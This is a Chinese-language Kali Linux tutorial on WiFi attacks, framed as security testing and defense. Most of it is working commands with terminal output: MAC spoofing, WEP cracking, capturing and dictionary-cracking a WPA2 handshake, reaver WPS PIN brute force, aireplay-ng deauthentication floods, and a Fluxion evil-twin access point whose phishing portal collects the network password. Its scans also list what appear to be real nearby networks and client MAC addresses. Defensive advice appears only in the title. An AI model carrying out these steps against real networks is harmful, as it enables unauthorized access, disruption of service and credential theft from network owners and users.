Wifi无线安全测试与防御

Wifi无线安全测试与防御

无线WiFi安全测试的必要性

Wifi网络发展状况

  • 目前来说越来越多的移动设备采用WiF连接到互联网上,无线WiFi也成为移动设备接入到互联网上的主要方式。
  • 无线网络的普及,使得越来越多的移动设备接入到WiFi局域网中。如果局域网存在恶意用户,那么很有可能就对网络造成安全影响。因此企业需要投入大量精力做WiFi无线安全测试与防御工作。

查看网卡信息。

  • Kali Linux中可以使用ifconfig命令查看网卡信息。
┌──(root💀kali)-[~/桌面]
└─# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.10.184  netmask 255.255.255.0  broadcast 192.168.10.255
        inet6 fe80::20c:29ff:fe1a:4004  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:1a:40:04  txqueuelen 1000  (Ethernet)
        RX packets 65314  bytes 4499172 (4.2 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 75817  bytes 52246705 (49.8 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 24  bytes 1200 (1.1 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 24  bytes 1200 (1.1 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

  • 在返回的结果中eth0,lo两张网卡,其中inet是对应的IP地址,netmask是对应的netmask,ether对应的MAC地址。
  • Kali Linux中使用iwconfig命令查看当前无线网卡信息(可以进行无线嗅探和注入的网卡).
┌──(root💀kali)-[~/桌面]
└─# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=0 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

增大无线网卡传输功率

  • 使用iwconfig wlan0 txpower 30命令将wlan0的功率提升到30。
┌──(root💀kali)-[~/桌面]
└─# iwconfig wlan0 txpower 30

┌──(root💀kali)-[~/桌面]
└─# iwconfig wlan0            
wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=0 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

# 我的网卡不支持提高功率

Wifi无线侦查发现

激活网卡混杂模式(监听模式)

  • 连接到Kali Linux网卡并不处于可以进行无线网络监听的状态,需要手工启动监听才可以。使用airmon-ng start wlan0,激活wlan0网卡的混杂模式。
┌──(root💀kali)-[~/桌面]
└─# airmon-ng start wlan0

Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
    481 NetworkManager
    675 dhclient

PHY     Interface       Driver          Chipset

phy0    wlan0           rt2800usb       Ralink Technology, Corp. RT5370
                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)
  • 再使用iwdconfig查看网卡信息,wlan0编号变成wlan0mon。
┌──(root💀kali)-[~/桌面]
└─# iwconfig      
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Power Management:off
  • 解决启动监听是,可能存在的问题。使用命令airmon-ng check kill关闭阻碍进程。
┌──(root💀kali)-[~/桌面]
└─# airmon-ng check kill 

Killing these processes:

    PID Name
    675 dhclient

嗅探当前范围内的wifi网络

  • wifi网络中,AP与客户端之间的距离大约100m左右。因此我们可以在本地探测到这个范围内的无线网络。使用airodump wlan0mon命令。
┌──(root💀kali)-[~/桌面]
└─# airodump-ng wlan0mon

 CH  4 ][ Elapsed: 1 min ][ 2021-03-18 20:28                                                                                    

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                                                                                                                            

 D0:C7:C0:18:59:C0  -62       22        0    0   6  270   WPA2 CCMP   PSK  TP-LINK_59C0                                          48:7D:2E:59:BA:60  -62       27      201    0  11  405   WPA2 CCMP   PSK  TP-LINK_BA60                                          70:3A:73:09:AD:B1  -67       14        0    0  13  130   OPN              <length:  0>                                          70:3A:73:11:AD:B1  -67        4        7    0  13  130   OPN              HZJS-GiWiFi                                            70:3A:73:11:AD:D9  -76        5      141    0   1  130   OPN              HZJS-GiWiFi                                            70:3A:73:11:B1:00  -73        1        1    0   1  130   OPN              HZJS-GiWiFi                                      70:3A:73:09:AD:D9  -73        4        0    0   1  130   OPN              <length:  0>                                                                                                                                                     

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                                                                                                                                                          
 48:7D:2E:59:BA:60  5C:3A:45:9C:1C:27  -48    1e- 1     90      332         TP-LINK_BA60                                          48:7D:2E:59:BA:60  98:F6:21:C4:7E:C3  -58    0 - 1e     0        2                                                              48:7D:2E:59:BA:60  A4:4B:D5:95:36:D4  -70    0 - 1e     0        2                                                              48:7D:2E:59:BA:60  6A:14:82:F1:2F:36  -40    0 - 6e     0       15                                                              70:3A:73:11:B1:00  36:66:92:43:F9:EC   -1    1e- 0      0        1                                                                                                                                                                       
Quitting...                                                                                    
  • 其中BSSID是AP的MAC地址,ESSIS是无线的名称,ENC表示加密的方式。WEP WAP。

绕过MAC地址认证

无线WiFi认证的MAC地址限制设置

  • 在无线路由器后台可以设置MAC地址限制,固定具体的MAC地址机器进行连接。因为MAC地址是硬件地址,可以是一个机器的固定编号,而且是唯一的。一般情况下是不可以进行修改。

修改网卡的MAC地址

  • 在Kali Linux中使用ifconfig查看网卡信息,其中包含MAC地址。
  • 使用ifconfig eth0查看网卡eth0的网卡信息。其中ether所对应的内容就是MAC地址。
┌──(root💀kali)-[~/桌面]
└─# ifconfig eth0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.10.184  netmask 255.255.255.0  broadcast 192.168.10.255
        inet6 fe80::20c:29ff:fe1a:4004  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:1a:40:04  txqueuelen 1000  (Ethernet)
        RX packets 8  bytes 1694 (1.6 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 32  bytes 3422 (3.3 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
  • 一般情况下是无法进行网卡的MAC硬件地址的修改,但是在Kali Linux中提供了macchange可以进行修改。
┌──(root💀kali)-[~/桌面]
└─# macchanger -h
GNU MAC Changer
Usage: macchanger [options] device

  -h,  --help                   Print this help
  -V,  --version                Print version and exit
  -s,  --show                   Print the MAC address and exit
  -e,  --ending                 Don't change the vendor bytes
  -a,  --another                Set random vendor MAC of the same kind
  -A                            Set random vendor MAC of any kind
  -p,  --permanent              Reset to original, permanent hardware MAC
  -r,  --random                 Set fully random MAC
  -l,  --list[=keyword]         Print known vendors
  -b,  --bia                    Pretend to be a burned-in-address
  -m,  --mac=XX:XX:XX:XX:XX:XX
       --mac XX:XX:XX:XX:XX:XX  Set the MAC XX:XX:XX:XX:XX:XX

Report bugs to https://github.com/alobbs/macchanger/issues
  • 使用macchanger -m AA:AA:AA:AA:AA:AA eth0进行对eth0网卡MAC地址的修改。
┌──(root💀kali)-[~/桌面]
└─# macchanger -m AA:AA:AA:AA:AA:AA eth0                                                                                                                                                                                                
Current MAC:   00:0c:29:1a:40:04 (VMware, Inc.)
Permanent MAC: 00:0c:29:1a:40:04 (VMware, Inc.)
New MAC:       aa:aa:aa:aa:aa:aa (unknown)

┌──(root💀kali)-[~/桌面]
└─# ifconfig eth0 
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.10.184  netmask 255.255.255.0  broadcast 192.168.10.255
        inet6 fe80::20c:29ff:fe1a:4004  prefixlen 64  scopeid 0x20<link>
        ether aa:aa:aa:aa:aa:aa  txqueuelen 1000  (Ethernet)
        RX packets 11  bytes 2339 (2.2 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 38  bytes 4184 (4.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

破解WEP加密的WiFi

WEP加密WiFi破解原理

  • WiFi设置WEP是加密传输。防止未知终端接入你的路由器。一般WiFi可采用的加密方式有WEP、WPA和WPA2等加密标准。
  • 有线等效保密(WEP)是世界上使用最广泛的Wi-Fi安全算法。因为历史的缘故,以及向后兼容的原因,很多路由器的控制面板中,用户会发现该算法位于加宓型选择菜单的首位。
  • WEP于1999年9月被批准作为Wi-Fi安全标准。即使在时那个年代,第一版WEP的加密强度也不算高,因为美国对各类密码技术的限制,导致制造商仅釆用了64位加密。当该限制解除时,加密强度提升至128位。尽管后来还引入了256位WEP加密,但128位加密仍然是最常见的加密。
  • 尽管经过了修订算法,加长密钥等升级,但是随着时间的推移,人们发现了WEP标准的许多漏洞,随着计算能力的提高,利用难度也越来越低。早在2001年,就已经有相关漏洞的POC验证测试,2005年美国联邦调查局发布了公开演示(以增强人们对WEP标准缺陷的认识),他们使用公开的免费软件在几分钟内就破解了WEP的密码。
  • 尽管还进行了种种改进、变通,或支撑WEP系统的尝试,但它仍然非常脆弱,依赖WEP的系统 应该进行升级,如果不能进行安全升级,就更換新产品吧。Wi-Fi协会于2004年宣WEP正式退役。

破解WEP加密WiFi认证

  • 启动监听airmon-ng start wlan0
  • 确定目标airodump-ng wlan0mon
  • 抓取WEP数据包airodump-ng --bssid AP-MAC 地址 --channel 信道号 --write WEP文件名 wlan0mon
  • DOS测试获取更多流量数据包aireplay-ng -3 -b AP-MAC地址 -h 指定AP连接的客户端MAC地址 wlan0mon
  • 破解密码 aircrack-ng WEP文件名.cap

注意:一定要抓取足够的WEP数据包,才能更加方便的进行破解。

破解WAP或者WAP2加密的Wifi

WAP和WAP2认证破解原理

  • 原理:在于每次进行认证时,都需要发送认证数据包,四次握手。抓取到握手包,就可以进行字典密码枚举破解。

WAP或WAP2加密的WiFi认证。

  • 启动监听airmon-ng start wlan0
┌──(root💀kali)-[~/桌面]
└─# airmon-ng start wlan0

Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
    481 NetworkManager
    675 dhclient

PHY     Interface       Driver          Chipset

phy0    wlan0           rt2800usb       Ralink Technology, Corp. RT5370
                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)
  • 确定目标airodump-ng wlan0mon
┌──(root💀kali)-[~/桌面]
└─# airodump-ng wlan0mon

 CH  4 ][ Elapsed: 1 min ][ 2021-03-18 20:28                                                                                    

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                                                                                                                            

 D0:C7:C0:18:59:C0  -62       22        0    0   6  270   WPA2 CCMP   PSK  TP-LINK_59C0                                          48:7D:2E:59:BA:60  -62       27      201    0  11  405   WPA2 CCMP   PSK  TP-LINK_BA60                                          70:3A:73:09:AD:B1  -67       14        0    0  13  130   OPN              <length:  0>                                          70:3A:73:11:AD:B1  -67        4        7    0  13  130   OPN              HZJS-GiWiFi                                            70:3A:73:11:AD:D9  -76        5      141    0   1  130   OPN              HZJS-GiWiFi                                            70:3A:73:11:B1:00  -73        1        1    0   1  130   OPN              HZJS-GiWiFi                                      70:3A:73:09:AD:D9  -73        4        0    0   1  130   OPN              <length:  0>                                                                                                                                                     

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                                                                                                                                                          
 48:7D:2E:59:BA:60  5C:3A:45:9C:1C:27  -48    1e- 1     90      332         TP-LINK_BA60                                          48:7D:2E:59:BA:60  98:F6:21:C4:7E:C3  -58    0 - 1e     0        2                                                              48:7D:2E:59:BA:60  A4:4B:D5:95:36:D4  -70    0 - 1e     0        2                                                              48:7D:2E:59:BA:60  6A:14:82:F1:2F:36  -40    0 - 6e     0       15                                                              70:3A:73:11:B1:00  36:66:92:43:F9:EC   -1    1e- 0      0        1                                                                                                                                                                       
Quitting...                                                                                    ```

+ 抓取WEP数据包`airodump-ng --bssid AP-MAC 地址 --channel 信道号 --write WEP文件名 wlan0mon`。

```bash
┌──(root💀kali)-[~]
└─# airodump-ng --bssid 48:7d:2E:59:ba:60 -c 6 -w wifi wlan0mon
23:27:39  Created capture file "wifi-01.cap".

 CH  6 ][ Elapsed: 54 s ][ 2021-03-21 23:28 ][ WPA handshake: 48:7D:2E:59:BA:60                                     

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                

 48:7D:2E:59:BA:60  -55  90      387      161    0   6  405   WPA2 CCMP   PSK  TP-LINK_BA60                         

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                                  

 48:7D:2E:59:BA:60  6A:14:82:F1:2F:36  -36    1e- 6e     0       20                                                 
 48:7D:2E:59:BA:60  A4:4B:D5:95:36:D4  -38    1e- 1e     6      169  EAPOL                                          
 48:7D:2E:59:BA:60  96:F6:49:32:22:AB  -58   11e- 1e   161      124                                                 
 48:7D:2E:59:BA:60  5C:3A:45:9C:1C:27  -62    0 - 1      4     1004         TP-LINK_BA60                            
Quitting...                                                                              

# 如果出现handshake就可以了。
  • DOS测试获取更多流量数据包aireplay-ng -0 0 -a 目标路由器MAC地址 -e 连接路由器设备MAC地址 wlan0mon
┌──(root💀kali)-[~]
└─# aireplay-ng -0 0 -a 48:7d:2e:59:ba:60 -e a4:48:d5:95:36:d4 wlan0mon                                
23:43:32  Waiting for beacon frame (BSSID: 48:7D:2E:59:BA:60) on channel 6
For the given BSSID "48:7D:2E:59:BA:60", there is an ESSID mismatch!
Found ESSID "TP-LINK_BA60" vs. specified ESSID "a4:48:d5:95:36:d4"
Using the given one, double check it to be sure its correct!
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
23:43:32  Sending DeAuth (code 7) to broadcast -- BSSID: [48:7D:2E:59:BA:60]
23:43:33  Sending DeAuth (code 7) to broadcast -- BSSID: [48:7D:2E:59:BA:60]
23:43:33  Sending DeAuth (code 7) to broadcast -- BSSID: [48:7D:2E:59:BA:60]
23:43:34  Sending DeAuth (code 7) to broadcast -- BSSID: [48:7D:2E:59:BA:60]
23:43:34  Sending DeAuth (code 7) to broadcast -- BSSID: [48:7D:2E:59:BA:60]
23:43:35  Sending DeAuth (code 7) to broadcast -- BSSID: [48:7D:2E:59:BA:60]
23:43:36  Sending DeAuth (code 7) to broadcast -- BSSID: [48:7D:2E:59:BA:60]
23:43:36  Sending DeAuth (code 7) to broadcast -- BSSID: [48:7D:2E:59:BA:60]
23:43:37  Sending DeAuth (code 7) to broadcast -- BSSID: [48:7D:2E:59:BA:60]
23:43:37  Sending DeAuth (code 7) to broadcast -- BSSID: [48:7D:2E:59:BA:60]
23:43:38  Sending DeAuth (code 7) to broadcast -- BSSID: [48:7D:2E:59:BA:60]
23:43:38  Sending DeAuth (code 7) to broadcast -- BSSID: [48:7D:2E:59:BA:60]
23:43:39  Sending DeAuth (code 7) to broadcast -- BSSID: [48:7D:2E:59:BA:60]
23:43:39  Sending DeAuth (code 7) to broadcast -- BSSID: [48:7D:2E:59:BA:60]
23:43:40  Sending DeAuth (code 7) to broadcast -- BSSID: [48:7D:2E:59:BA:60]
23:43:41  Sending DeAuth (code 7) to broadcast -- BSSID: [48:7D:2E:59:BA:60]
  • 破解密码 aircrack-ng -w 密码字典 WEP文件名.cap
┌──(root💀kali)-[~]
└─# aircrack-ng -w password wifi-01.cap                        
Reading packets, please wait...
Opening wifi-01.cap
Read 17566 packets.

   #  BSSID              ESSID                     Encryption

   1  48:7D:2E:59:BA:60  TP-LINK_BA60              WPA (1 handshake)

Choosing first network as target.

Reading packets, please wait...
Opening wifi-01.cap
Read 17566 packets.

1 potential targets


                               Aircrack-ng 1.6 

      [00:00:00] 22/22 keys tested (751.24 k/s) 

      Time left: --

                        KEY FOUND! [ 1234567890 ]


      Master Key     : DD E9 C2 78 F0 1A 57 F5 E1 E2 47 44 F1 9B EC B3 
                       1E D7 DE AE 34 7A BF 11 08 74 71 66 50 A3 34 04 

      Transient Key  : BC 2B B8 26 99 39 D3 AD 9B 10 CA 66 E6 96 62 F1 
                       36 B8 25 1D 4F 34 41 1A 55 A1 5D 0A 43 E6 7B CF 
                       1D 6B 27 67 D8 CC C9 02 AC 5A 43 07 A2 6B 52 1F 
                       31 2D DA 82 13 63 37 9C 2D 04 B8 52 41 72 1C 00 


破解WiFi Pin码

无线WiFi中的Pin码介绍

  • 在无线WiFi中设置WPS开关,启动Pin认证时一个8位数字的密钥,很容易被破解。

Reaver破解Pin码

  • 查看启动WPS的网络wash -i 网卡
┌──(root💀kali)-[~/桌面]
└─# wash -i wlan0mon
BSSID               Ch  dBm  WPS  Lck  Vendor    ESSID
--------------------------------------------------------------------------------
D0:C7:C0:18:59:C0    6  -65  2.0  No   Unknown   TP-LINK_59C0
  • 进行破解reaver -i 网卡 -b AP-MAC地址 -vv -c 信道
┌──(root💀kali)-[~/桌面]
└─# reaver -i wlan0mon -b D0:C7:C0:18:59:C0 -vv -c 6

Reaver v1.6.6 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching wlan0mon to channel 6
[+] Waiting for beacon from D0:C7:C0:18:59:C0
[+] Received beacon from D0:C7:C0:18:59:C0
[+] Vendor: Unknown 
[+] Trying pin "12345670"
[+] Sending authentication request

Rogon Wifi安全测试与防御

WiFi劫持原理

  • 根据Wi-Fi定位的原理我们很容易想到劫持定位的简单办法就是伪造足够多的热点,欺骗服务器我们在特定地点。因为伪造的热点信息需要已经在数据库中,所以需要获取伪造地点附近的真实热点信息。

  • 现有的热点信号会干扰结果,因此在周围热点数量较少时比较容易成功。

Fluxion工具安装

  • Fluxion是一种安全审核和社会工程研究工具。
# 下载
git clone git@github.com:FluxionNetwork/fluxion.git
git clone https://www.github.com/FluxionNetwork/fluxion.git
# 切换到工具目录 
cd fluxion 
# 安装
./fluxion.sh -i

Fluxion工具安全测试

  • 启动Fluxion工具
┌──(root💀kali)-[~/下载/fluxion-master]
└─# ./fluxion.sh   
  • 选择语言
[*] Select your language

        [1] ar / Arabic
        [2] cs / čeština
        [3] de / Deutsch
        [4] el / Ελληνικά
        [5] en / English
        [6] es / Español
        [7] fr / français
        [8] it / italiano
        [9] nl / Nederlands
        [10] pl / Polski
        [11] pt-br / Português-BR
        [12] ro / Română
        [13] ru / Русский
        [14] sk / slovenčina
        [15] sl / Slovenščina
        [16] tur / Türkçe
        [17] zh / 中文

[fluxion@kali]-[~] 17
  • 选择攻击方式
[*] 请选择一个攻击方式

                           ESSID: "[N/A]" / [N/A]                                         
                         Channel:  [N/A]                                                  
                           BSSID:  [N/A] ([N/A])                               

        [1] 专属门户 创建一个“邪恶的双胞胎”接入点。
        [2] Handshake Snooper 检索WPA/WPA2加密散列。
        [3] 返回 

[fluxion@kali]-[~] 1
  • 选择扫描信道
[*] 选择要扫描的信道                                                                      

        [1] 扫描所有信道  (2.4GHz)                                                        
        [2] 扫描所有信道  (5GHz)                                                          
        [3] 扫描所有信道  (2.4GHz & 5Ghz)                                                 
        [4] 扫描指定信道                                                                  
        [5] 返回                                                                          

[fluxion@kali]-[~] 1    
  • 选择wifi
                                         WIFI LIST                                        

[ * ] ESSID                                    QLTY PWR STA CH SECURITY              BSSID

[001] TP-LINK_****                              90% -63   0 11 WPA2 WPA  D0:C7:**:**:59:C0
[002] TP-LINK_****                             100% -60   0  6 WPA2 WPA  48:7D:**:**:BA:60
[003] ****                                     100% -59   0  1 WPA2 WPA  70:3A:**:**:AD:B1
[004] TP-LINK_****                             100% -53   0 10 WPA2      88:25:**:**:B1:70

[fluxion@kali]-[~] 2
  • 选择无线接口
[*] 为目标跟踪选择无线接口.
[*] 可能需要选择专用接口.
[*] 如果您不确定,请选择"跳过"!

[1] wlan0mon [*] Ralink Technology, Corp. RT5370                                          
[2] 跳过                                                                              
[3] 重试                                                                              
[4] 返回                                                                              

[fluxion@kali]-[~] 1
  • 选择一个接口
[*] 为接入点选择一个接口

[1] eth0     [-] Intel Corporation 82545EM Gigabit Ethernet Controller (Copper) (rev 01)  
[2] wlan0mon [*] Ralink Technology, Corp. RT5370                                          
[3] 重试                                                                              
[4] 返回                                                                              

[fluxion@kali]-[~] 2
  • 选择一个接入点
[*] 选择一个接入点

                           ESSID: "TP-LINK_BA60" / WPA2 WPA                               
                         Channel:  6                                                      
                           BSSID:  48:7D:2E:59:BA:60 ([N/A])                        

        [1] 流氓 AP - hostapd (推荐)
        [2] 流氓 AP - airbase-ng (缓慢)
        [3] 返回

[fluxion@kali]-[~] 1
  • 选择验证密码方式
[*] 指定捕获到的握手包存放的路径 (例如: /.../dump-01.cap)
[*] 要返回,请将hash路径留空

捕获到握手包后存放的绝对路径: /root/桌面/wifi-01.cap
  • 选择Hash的验证方法
[*] 选择Hash的验证方法

                           ESSID: "TP-LINK_BA60" / WPA2 WPA                               
                         Channel:  6                                                      
                           BSSID:  48:7D:2E:59:BA:60 ([N/A])                        

        [1] aircrack-ng 验证 (不推荐)
        [2] cowpatty 验证 (推荐用这个)

[fluxion@kali]-[~] 2
  • 选择钓鱼认证门户的SSL证书来源
[*] 选择钓鱼认证门户的SSL证书来源

        [1] 创建SSL证书
        [2] 检测SSL证书 (再次搜索)
        [3] 没有证书 (disable SSL)
        [4] 返回

[fluxion@kali]-[~] 1
  • 选择1,让连接目标wifi的设备都断开连接。
[*] 为流氓网络选择Internet连接类型

        [1] 断开原网络 (推荐)
        [2] 仿真
        [3] 返回

[fluxion@kali]-[~] 1
  • 验证网页我这里选择自带的通用认证网页(Chinese),虽然有些假,但是我们可以自己写一个认证网页以达到以假乱真的地步。根据路由器的厂家比如TP-link,水星,华为,等等等为其编写相应的路由认证网页(这一步是你能不能得到秘钥的关键)!
[*] 选择钓鱼热点的认证网页界面

                           ESSID: "TP-LINK_BA60" / WPA2 WPA                               
                         Channel:  6                                                      
                           BSSID:  48:7D:2E:59:BA:60 ([N/A])                        

               [01] 通用认证网页                               Arabic               
               [02] 通用认证网页                            Bulgarian               
               [03] 通用认证网页                              Chinese               
               [04] 通用认证网页                                Czech               
               [05] 通用认证网页                               Danish               
               [06] 通用认证网页                                Dutch               
               [07] 通用认证网页                              English               
               [08] 通用认证网页                               French               
               [09] 通用认证网页                               German               
               .......
               [77] Zyxel                                                ru               
               [78] Zyxel                                               tur               
               [79] 返回                                                         

[fluxion@kali]-[~] 3
  • 六个窗口全部弹出,伪AP已建立,原AP受到攻击无法登录

  • 打开原先连接此WiFi的设备,发现原WiFi已经无法登录,设备自动连接咱们的伪热点。此时弹出验证网页。
    伪AP以建立